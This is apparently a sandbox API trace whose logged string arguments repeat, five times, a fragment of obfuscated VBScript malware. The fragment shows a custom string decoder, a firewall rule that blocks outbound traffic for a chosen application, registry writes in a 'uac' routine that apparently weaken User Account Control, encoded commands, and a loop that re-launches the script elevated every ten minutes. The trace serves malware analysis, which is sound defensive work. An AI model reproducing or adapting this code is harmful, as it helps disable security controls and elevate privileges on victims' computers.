SIG '' Begin signature block", _MaxCount=0x21) returned 60 [0223.024] wcsncmp (_String1="FAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0223.024] wcsncmp (_String1="AEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 52 [0223.024] wcsncmp (_String1="EIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0223.025] wcsncmp (_String1="IBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 60 [0223.025] wcsncmp (_String1="BSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", 